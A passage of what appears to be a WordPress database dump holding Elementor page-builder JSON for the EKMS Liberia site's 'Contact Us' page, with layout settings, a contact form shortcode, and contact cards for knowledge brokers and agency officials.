Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"slideshow\",\"background_color\":\"rgba(255,255,255,0.75)\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_slideshow_gallery\":[{\"id\":2315,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\"}],\"background_slideshow_loop\":\"\"},\"elements\":[],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":25,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"J.S. Datuama Cammue\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"caption\":\"Benjamin Karmorh\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Berexford S. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"John K. Jallah\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"caption\":\"Kawusu Toure\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamag@gmail.com\\\">blamag@gmail.com<\\/a><br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(19784,2894,'_elementor_edit_mode','builder'),(19785,2894,'_elementor_template_type','wp-page'),(19786,2894,'_elementor_version','2.7.5'),(19787,2894,'_wp_page_template','default'),(19788,2894,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"background_background\":\"slideshow\",\"background_color\":\"rgba(255,255,255,0.75)\",\"background_attachment\":\"fixed\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_slideshow_gallery\":[{\"id\":2315,\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\"}],\"background_slideshow_loop\":\"\"},\"elements\":[],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form 